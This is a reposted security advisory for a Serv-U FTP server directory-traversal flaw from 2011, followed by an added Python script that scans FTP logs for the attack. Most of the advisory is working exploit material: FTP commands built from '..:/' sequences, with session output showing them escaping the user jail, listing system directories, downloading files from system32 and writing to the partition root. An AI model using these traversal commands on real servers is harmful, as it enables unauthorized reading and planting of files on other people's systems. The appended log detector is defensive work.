Serv-U FTP Jail Break (unauthorized directory traversal and arbitrary file download)
<p>The programs (methods) provided on this site may be offensive in nature and are intended for security research and teaching only. Use at your own risk! <br /><br /><div class="msgheader">The code is as follows:</div><div class="msgborder" id="phpcode1"> <br />[*]----------------------------------------------------[*] <br />Serv-U FTP Server Jail Break 0day <br />Discovered By Kingcope <br />Year 2011 <br />[*]----------------------------------------------------[*] <br />/* <br />sebug.net <br />By constructing ..:/ sequences, the server's directories can be traversed and arbitrary files downloaded <br />Affected versions: 6.4, 7.1, 7.3, 8.2, 10.5 <br />*/ <br />Affected: <br />220 Serv-U FTP Server v7.3 ready... <br />220 Serv-U FTP Server v7.1 ready... <br />220 Serv-U FTP Server v6.4 ready... <br />220 Serv-U FTP Server v8.2 ready... <br />220 Serv-U FTP Server v10.5 ready... <br />[*]----------------------------------------------------[*] <br />C:\Users\kingcope\Desktop>ftp 192.168.133.134 <br />Verbindung mit 192.168.133.134 wurde hergestellt. <br />220 Serv-U FTP Server v6.4 for WinSock ready... <br />Benutzer (192.168.133.134:(none)): ftp (anonymous user :>) <br />331 User name okay, please send complete E-mail address as password. <br />Kennwort: <br />230 User logged in, proceed. <br />ftp> cd "/..:/..:/..:/..:/program files" <br />250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/program files <br />ftp> ls -la <br />200 PORT Command successful. <br />150 Opening ASCII mode data connection for /bin/ls. <br />dr--r--r-- 1 user group 0 Nov 12 21:48 . <br />dr--r--r-- 1 user group 0 Nov 12 21:48 .. 
<br />drw-rw-rw- 1 user group 0 Feb 14 2011 Apache Software Foundatio <br />n <br />drw-rw-rw- 1 user group 0 Feb 5 2011 ComPlus Applications <br />drw-rw-rw- 1 user group 0 Jul 11 01:06 Common Files <br />drw-rw-rw- 1 user group 0 Jul 8 16:57 CoreFTPServer <br />drw-rw-rw- 1 user group 0 Jul 11 01:06 IIS Resources <br />d--------- 1 user group 0 Jul 8 16:12 InstallShield <br />Installation Information <br />drw-rw-rw- 1 user group 0 Jul 29 15:07 Internet Explorer <br />drw-rw-rw- 1 user group 0 Jul 8 16:12 Ipswitch <br />drw-rw-rw- 1 user group 0 Feb 12 2011 Java <br />drw-rw-rw- 1 user group 0 Jul 26 13:19 NetMeeting <br />drw-rw-rw- 1 user group 0 Jul 29 14:39 Outlook Express <br />drw-rw-rw- 1 user group 0 Jul 8 15:39 PostgreSQL <br />drw-rw-rw- 1 user group 0 Nov 12 21:48 RhinoSoft.com <br />drw-rw-rw- 1 user group 0 Feb 12 2011 Sun <br />d--------- 1 user group 0 Jul 29 15:13 Uninstall Information <br />drw-rw-rw- 1 user group 0 Feb 5 2011 VMware <br />drw-rw-rw- 1 user group 0 Jul 8 15:34 WinRAR <br />drw-rw-rw- 1 user group 0 Jul 26 13:30 Windows Media Player <br />drw-rw-rw- 1 user group 0 Feb 5 2011 Windows NT <br />d--------- 1 user group 0 Feb 5 2011 WindowsUpdate <br />226 Transfer complete. <br />FTP: 1795 Bytes empfangen in 0,00Sekunden 448,75KB/s <br />ftp> <br />[*]----------------------------------------------------[*] <br />with write perms: <br />ftp> put foo.txt ..:/..:/..:/foobar <<-- writes foo into root of partition <br />[*]----------------------------------------------------[*] <br />and as anonymous ftp: <br />ftp> get ..:/..:/..:/..:/windows/system32/calc.exe yes <br />200 PORT Command successful. <br />150 Opening ASCII mode data connection for calc.exe (115712 Bytes). <br />226 Transfer complete. <br />FTP: 115712 Bytes empfangen in 0,04Sekunden 2571,38KB/s <br />[*]----------------------------------------------------[*] <br />This works to!!! : <br />220 Serv-U FTP Server v7.3 ready... 
<br />Benutzer (xx.xx.xx.xx:(none)): ftp <br />331 User name okay, please send complete E-mail address as password. <br />Kennwort: <br />230 User logged in, proceed. <br />ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\*" <br />200 PORT Command successful. <br />150 Opening ASCII mode data connection for /bin/ls. <br />. <br />.. <br />AUTOEXEC.BAT <br />boot.ini <br />bootfont.bin <br />bsmain_runtime.log <br />CONFIG.SYS <br />Documents and Settings <br />FPSE_search <br />Inetpub <br />IO.SYS <br />log <br />MSDOS.SYS <br />msizap.exe <br />MSOCache <br />mysql <br />NTDETECT.COM <br />ntldr <br />Program Files <br />RavBin <br />RECYCLER <br />Replay.log <br />rising.ini <br />System Volume Information <br />TDDOWNLOAD <br />WCH.CN <br />WINDOWS <br />wmpub <br />226 Transfer complete. 317 bytes transferred. 19.35 KB/sec. <br />FTP: 317 Bytes empfangen in 0,01Sekunden 21,13KB/s <br />[*]----------------------------------------------------[*] <br />Sometimes you need to give it the path: <br />ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\" <br />ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\*" <br />200 PORT Command successful. <br />150 Opening ASCII mode data connection for /bin/ls. <br />. <br />.. 
<br />360 <br />Adobe <br />ASP.NET <br />CCProxy <br />CE Remote Tools <br />cmak <br />Common Files <br />ComPlus Applications <br />D-Tools <br />FFTPServer <br />HTML Help Workshop <br />IISServer <br />InstallShield Installation Information <br />Intel <br />Internet Explorer <br />Java <br />JavaSoft <br />K-Lite Codec Pack <br />Microsoft ActiveSync <br />Microsoft Analysis Services <br />Microsoft Device Emulator <br />Microsoft MapPoint Web Service Samples <br />Microsoft MapPoint Web Service SDK, Version 4.0 <br />Microsoft Office <br />Microsoft Office Servers <br />Microsoft Silverlight <br />Microsoft SQL Server <br />Microsoft Visual SourceSafe <br />Microsoft Visual Studio 8 <br />Microsoft.NET <br />MSBuild <br />MSXML 6.0 <br />NetMeeting <br />Outlook Express <br />PortMap1.61 <br />Reference Assemblies <br />Rising <br />SQLXML 4.0 <br />SQLyog Enterprise <br />STS2Setup_2052 <br />Symantec <br />Thunder Network <br />TSingVision <br />Uninstall Information <br />Windows Media Player <br />Windows NT <br />WindowsUpdate <br />WinRAR <br />226 Transfer complete. 835 bytes transferred. 50.96 KB/sec. <br />FTP: 835 Bytes empfangen in 0,01Sekunden 64,23KB/s <br />ftp> <br /></div><br />@Sebug.net [ 2011-12-01 ]<br />Fix provided by Jiaoben: this class of problem can be prevented by configuring Serv-U's permissions. Be sure to pay attention to Serv-U's security settings.</p>
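<p>Added example (not part of the original advisory and not Serv-U code): a log check that flags FTP path commands whose argument contains the colon-decorated ".." segments shown in the session above. The log layout, the sample lines and the function names are assumptions constructed for illustration; adapt the line pattern to the format your server actually writes.</p>

```python
import re
from collections import Counter

# FTP verbs whose argument is a path (RFC 959 plus common extensions).
PATH_VERBS = {"CWD", "XCWD", "RETR", "STOR", "APPE", "LIST", "NLST", "MLSD",
              "MLST", "SIZE", "MDTM", "DELE", "MKD", "RMD", "RNFR", "RNTO"}
# A ".." path segment decorated with colons, such as "..:" or ":..".
COLON_DOTDOT = re.compile(r"^:*\.\.:*$")
# Assumed (constructed) log layout: date time client-ip user VERB [argument]
LINE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\w+)(?: (.*))?$")

# Constructed sample log; the addresses are documentation ranges.
SAMPLE_LOG = r"""
2011-12-01 10:00:01 192.0.2.10 ftp PASS user@example.org
2011-12-01 10:00:02 192.0.2.10 ftp CWD /pub/../pub
2011-12-01 10:00:03 192.0.2.10 ftp RETR /pub/readme.txt
2011-12-01 10:05:11 192.0.2.77 ftp CWD /..:/..:/..:/..:/program files
2011-12-01 10:05:12 192.0.2.77 ftp NLST -a ..:\:..\..:\*
2011-12-01 10:05:13 192.0.2.77 ftp RETR ..:/..:/..:/..:/windows/system32/calc.exe
2011-12-01 10:09:40 198.51.100.5 alice STOR ..:/..:/..:/foobar
2011-12-01 10:09:41 198.51.100.5 alice RETR report..:final.txt
""".strip().splitlines()

def suspicious_segments(arg):
    """Return the colon-decorated '..' segments in a command argument."""
    # Split on both separators and on spaces so "NLST -a <path>" is covered.
    return [s for s in re.split(r"[\\/\s]+", arg)
            if ":" in s and COLON_DOTDOT.match(s)]

def scan(lines):
    """Return one finding per path command that carries such segments."""
    findings = []
    for number, line in enumerate(lines, 1):
        m = LINE.match(line.strip())
        if not m:
            continue
        _, client, user, verb, arg = m.groups()
        if verb.upper() not in PATH_VERBS or not arg:
            continue
        hits = suspicious_segments(arg)
        if hits:
            findings.append({"line": number, "client": client, "user": user,
                             "verb": verb.upper(), "depth": len(hits)})
    return findings

def clients_by_hits(findings):
    """Count flagged commands per client address for triage."""
    return Counter(f["client"] for f in findings).most_common()

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
    print(clients_by_hits(scan(SAMPLE_LOG)))
```

<p>A plain ".." inside the user's own directory tree and file names that merely contain "..:" are left alone; only whole segments made of ".." plus colons are reported.</p>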